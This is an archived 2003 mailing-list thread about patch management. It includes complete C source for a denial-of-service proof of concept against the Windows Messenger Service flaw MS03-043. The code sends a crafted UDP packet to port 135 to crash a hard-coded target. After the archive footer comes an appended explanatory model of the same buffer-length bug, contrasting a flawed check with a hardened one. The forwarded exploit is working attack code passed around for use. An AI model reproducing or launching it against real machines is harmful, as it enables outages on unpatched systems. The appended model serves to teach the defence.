RE: Attack the MS043 vulnerability

From: Wright, Jeremy (wright@admworld.com)
Date: Wed Oct 22 2003 - 09:34:07 GMT-3


This was considered and recommended by me but was not given the green light by management. I guess they still don't see that the cost of desktop agents/patch management is much less than the cost of downtime due to virus/worm propagation, especially in an environment as large as mine. The code I sent is what I used to prove to my boss that the exploit is not that tough to hack. I received the code from another security list and passed it on to hopefully help someone in a similar situation as mine. Thanks

-----Original Message-----
From: Peter [mailto:peter@cyscoexpert.com]
Sent: Tuesday, October 21, 2003 10:02 PM
To: security@groupstudy.com
Cc: ccielab@groupstudy.com
Subject: Re: Attack the MS043 vulnerability

Rather think of Cisco Security Agent for all the desktops and servers.

_____________________________
Peter
#7247 (R&S, Security, SP)
CyscoExpert Corp.
4433 W. Touhy Ave. Suite 410
Lincolnwood, IL 60712
Phone (847) 674-3392
Toll Free (866) CyscoXP (297-2697)
Fax (847) 674-2625

----- Original Message -----
From: "Wright, Jeremy" <wright@admworld.com>
To: "'Brian McGahan '" <bmcgahan@internetworkexpert.com>; "Wright, Jeremy"
<wright@admworld.com>; <security@groupstudy.com>
Cc: <ccielab@groupstudy.com>
Sent: Tuesday, October 21, 2003 9:52 PM
Subject: RE: Attack the MS043 vulnerability

> Yes, and to let upper management understand the importance of patch
> management instead of having interns running around like crazy every other
> week :)
>
> -----Original Message-----
> From: Brian McGahan
> To: 'Wright, Jeremy'; security@groupstudy.com
> Cc: ccielab@groupstudy.com
> Sent: 10/21/2003 8:23 PM
> Subject: RE: Attack the MS043 vulnerability
>
> Jeremy,
>
> The code sample I'm assuming is for educational and research
> purposes only, right? :)
>
> Brian McGahan, CCIE #8593
> bmcgahan@internetworkexpert.com
>
> Internetwork Expert, Inc.
> http://www.InternetworkExpert.com
> Toll Free: 877-224-8987
> Direct: 708-362-1418 (Outside the US and Canada)
>
>
> > -----Original Message-----
> > From: nobody@groupstudy.com [mailto:nobody@groupstudy.com] On Behalf
> Of
> > Wright, Jeremy
> > Sent: Tuesday, October 21, 2003 8:13 PM
> > To: 'security@groupstudy.com'
> > Cc: 'ccielab@groupstudy.com'
> > Subject: OT:Attack the MS043 vulnerability
> >
> > /*
> > DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
> > Launching it one or two times against the target should make the machine
> > reboot. Tested against a Win2K SP4.
> >
> > "The vulnerability results because the Messenger Service does not properly
> > validate the length of a message before passing it to the allocated buffer"
> > according to MS bulletin. Digging into it a bit more, we find that when a
> > character 0x14 is encountered in the 'body' part of the message, it is
> > replaced by a CR+LF. The buffer allocated for this operation is twice the
> > size of the string, which is the way to go, but is then copied to a buffer
> > which was only allocated 11CAh bytes. Thanks to that, we can bypass the
> > length checks and overflow the fixed size buffer.
> >
> > Credits go to LSD :)
> >
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <winsock.h>
> > #include <string.h>
> > #include <time.h>
> >
> > #pragma comment(lib, "ws2_32.lib") // link against Winsock (wsock32.lib also works)
> >
> > // Packet format found thanks to a bit of sniffing
> > static unsigned char packet_header[] =
> >     "\x04\x00\x28\x00"
> >     "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> >     "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
> >     "\x4f\xb6\xe6\xfc"
> >     "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
> >     "\xff\xff\xff\xff"
> >     "\xff\xff\xff\xff"
> >     "\xff\xff\xff\xff"
> >     "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
> >     "\x00\x00\xff\xff\xff\xff"
> >     "\xff\xff\xff\xff" // @74 : fields length
> >     "\x00\x00";
> >
> > unsigned char field_header[] =
> >     "\xff\xff\xff\xff"  // @0 : field length
> >     "\x00\x00\x00\x00"
> >     "\xff\xff\xff\xff"; // @8 : field length
> >
> > int main(int argc, char *argv[])
> > {
> >     int i, packet_size, fields_size, s;
> >     unsigned char packet[8192];
> >     struct sockaddr_in addr;
> >     // A few conditions :
> >     //   0 <= strlen(from) + strlen(machine) <= 56
> >     //   max fields size 3992
> >     char from[] = "RECCA";
> >     char machine[] = "ZEUS";
> >     char body[4096] = "*** MESSAGE ***";
> >
> >     WSADATA wsaData;
> >
> >     WSAStartup(0x0202, &wsaData);
> >
> >     ZeroMemory(&addr, sizeof(addr));
> >     addr.sin_family = AF_INET;
> >     addr.sin_addr.s_addr = inet_addr("192.168.186.3"); // hard-coded target
> >     addr.sin_port = htons(135);
> >
> >     ZeroMemory(packet, sizeof(packet));
> >     packet_size = 0;
> >
> >     memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
> >     packet_size += sizeof(packet_header) - 1;
> >
> >     // 'from' field: length (incl. NUL) at @0 and @8, string padded to 4
> >     i = strlen(from) + 1;
> >     *(unsigned int *)(&field_header[0]) = i;
> >     *(unsigned int *)(&field_header[8]) = i;
> >     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
> >     packet_size += sizeof(field_header) - 1;
> >     strcpy((char *)&packet[packet_size], from);
> >     packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
> >
> >     // 'machine' field, same layout
> >     i = strlen(machine) + 1;
> >     *(unsigned int *)(&field_header[0]) = i;
> >     *(unsigned int *)(&field_header[8]) = i;
> >     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
> >     packet_size += sizeof(field_header) - 1;
> >     strcpy((char *)&packet[packet_size], machine);
> >     packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
> >
> >     fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n",
> >             3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
> >
> >     // Fill the body with 0x14: each one is expanded to CR+LF by the target
> >     memset(body, 0x14, sizeof(body));
> >     body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';
> >
> >     // 'body' field: not padded, the terminating NUL is part of the length
> >     i = strlen(body) + 1;
> >     *(unsigned int *)(&field_header[0]) = i;
> >     *(unsigned int *)(&field_header[8]) = i;
> >     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
> >     packet_size += sizeof(field_header) - 1;
> >     strcpy((char *)&packet[packet_size], body);
> >     packet_size += i;
> >
> >     fields_size = packet_size - (sizeof(packet_header) - 1);
> >     *(unsigned int *)(&packet[40]) = time(NULL);     // unique id
> >     *(unsigned int *)(&packet[74]) = fields_size;    // fields length
> >
> >     fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n",
> >             strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);
> >
> >     /*
> >     for (i = 0; i < packet_size; i++)
> >     {
> >         if (i && ((i & 1) == 0))
> >             fprintf(stdout, " ");
> >         if (i && ((i & 15) == 0))
> >             fprintf(stdout, "\n");
> >         fprintf(stdout, "%02x", packet[i]);
> >     }
> >     fprintf(stdout, "\n");
> >     */
> >
> >     if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
> >         exit(EXIT_FAILURE);
> >
> >     if (sendto(s, (const char *)packet, packet_size, 0, (struct sockaddr *)&addr,
> >                sizeof(addr)) == -1)
> >         exit(EXIT_FAILURE);
> >     /*
> >     if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
> >         exit(EXIT_FAILURE);
> >     */
> >
> >     exit(EXIT_SUCCESS);
> > }
> >
> >
> > CONFIDENTIALITY NOTICE:
> > This message is intended for the use of the individual or entity to
> > which it is addressed and may contain information that is privileged,
> > confidential and exempt from disclosure under applicable law. If the
> > reader of this message is not the intended recipient or the employee or
> > agent responsible for delivering this message to the intended recipient,
> > you are hereby notified that any dissemination, distribution or copying of
> > this communication is strictly prohibited.
> > If you have received this communication in error, please notify us
> > immediately by email reply or by telephone and immediately delete this
> > message and any attachments. In the U.S. call us toll free at (800)
> > 637-5843.
> > Spanish, French, Quebecois French, Portuguese, Polish, German,
> > Dutch, Turkish, Russian, Japanese and Chinese:
> > http://www.admworld.com/confidentiality.htm.
> >
> >
> > _______________________________________________________________________
> > Please help support GroupStudy by purchasing your study materials from:
> > http://shop.groupstudy.com
> >
> > Subscription information may be found at:
> > http://www.groupstudy.com/list/CCIELab.html
>



This archive was generated by hypermail 2.1.4 : Mon Nov 24 2003 - 07:53:06 GMT-3
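The bug class the quoted MS03-043 writeup describes is a length check applied to the input before a transform that grows it (0x14 becomes CR+LF), with the grown result then copied into a fixed 11CAh-byte buffer. The model below is an added example written for this page, not code from the thread, the PoC or the Messenger Service: only the 11CAh destination size and the 0x14 expansion come from the quoted text; vulnerable_flow, safe_flow, demo_case and the use of 3992 as the input bound are this example's own assumptions. It shows the vulnerable flow beside the hardened one and reports, without performing the unsafe copy, which inputs slip past the input-side check.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* From the quoted writeup: fixed destination of 11CAh bytes, and 0x14 is
 * the byte expanded to CR+LF. Everything else is an illustrative model. */
#define FIXED_BUF_SIZE 0x11CA
#define EXPAND_CHAR    0x14
/* Assumed input-side bound; the PoC's comment gives 3992 as max fields size. */
#define POC_MAX_INPUT  3992

/* Output size of the 0x14 -> CR+LF transform for len input bytes. */
size_t expanded_length(const unsigned char *src, size_t len)
{
    size_t out = 0;
    for (size_t i = 0; i < len; i++)
        out += (src[i] == EXPAND_CHAR) ? 2 : 1;
    return out;
}

/* Perform the transform into dst; the caller guarantees dst holds
 * expanded_length(src, len) bytes. Returns the number of bytes written. */
size_t expand_crlf(const unsigned char *src, size_t len, unsigned char *dst)
{
    size_t o = 0;
    for (size_t i = 0; i < len; i++) {
        if (src[i] == EXPAND_CHAR) {
            dst[o++] = '\r';
            dst[o++] = '\n';
        } else {
            dst[o++] = src[i];
        }
    }
    return o;
}

/* Model of the flawed flow: the check looks at the input length, the
 * expansion goes into a 2*len scratch buffer (safe), and the result is then
 * copied into a FIXED_BUF_SIZE buffer. Returns -1 if the input check rejects
 * the message, 1 if that final copy would overrun the fixed buffer (check
 * bypassed), 0 otherwise. The overrunning copy itself is not performed. */
int vulnerable_flow(const unsigned char *body, size_t len, size_t max_input)
{
    if (len > max_input)
        return -1;
    unsigned char *scratch = malloc(len * 2 + 1);
    if (scratch == NULL)
        return -1;
    size_t n = expand_crlf(body, len, scratch);
    free(scratch);
    /* the original flow would do memcpy(fixed, scratch, n) here */
    return n > FIXED_BUF_SIZE ? 1 : 0;
}

/* Hardened flow: bound the post-expansion size against the real destination
 * before writing anything. Returns 0 and sets *written on success, -1 if the
 * expanded message would not fit. */
int safe_flow(const unsigned char *body, size_t len,
              unsigned char *fixed, size_t fixed_size, size_t *written)
{
    size_t need = expanded_length(body, len);
    if (need > fixed_size)
        return -1;
    *written = expand_crlf(body, len, fixed);
    return 0;
}

/* Constructed input: a body of n copies of 'fill' (0x14 mirrors the PoC),
 * pushed through either flow. Returns that flow's result, or -2 if n is
 * larger than the local buffer. */
int demo_case(size_t n, unsigned char fill, int hardened)
{
    unsigned char body[8192];
    unsigned char fixed[FIXED_BUF_SIZE];
    size_t written = 0;
    if (n > sizeof(body))
        return -2;
    memset(body, fill, n);
    if (!hardened)
        return vulnerable_flow(body, n, POC_MAX_INPUT);
    return safe_flow(body, n, fixed, sizeof(fixed), &written);
}

int main(void)
{
    printf("3900 x 0x14, vulnerable flow: %d (1 = fixed buffer overrun)\n",
           demo_case(3900, 0x14, 0));
    printf("3900 x 'A',  vulnerable flow: %d\n", demo_case(3900, 'A', 0));
    printf("2278 x 0x14, vulnerable flow: %d (first length that overruns)\n",
           demo_case(2278, 0x14, 0));
    printf("3900 x 0x14, hardened flow:   %d (-1 = rejected)\n",
           demo_case(3900, 0x14, 1));
    printf("2000 x 0x14, hardened flow:   %d\n", demo_case(2000, 0x14, 1));
    return 0;
}
```

The boundary is worth noting: 0x11CA is 4554, so 2277 bytes of 0x14 expand to exactly the fixed size and pass, while 2278 overrun it; the PoC's near-3992-byte body expands to roughly 8000 bytes, far past the limit, which is why the input-side check (3992) never fires.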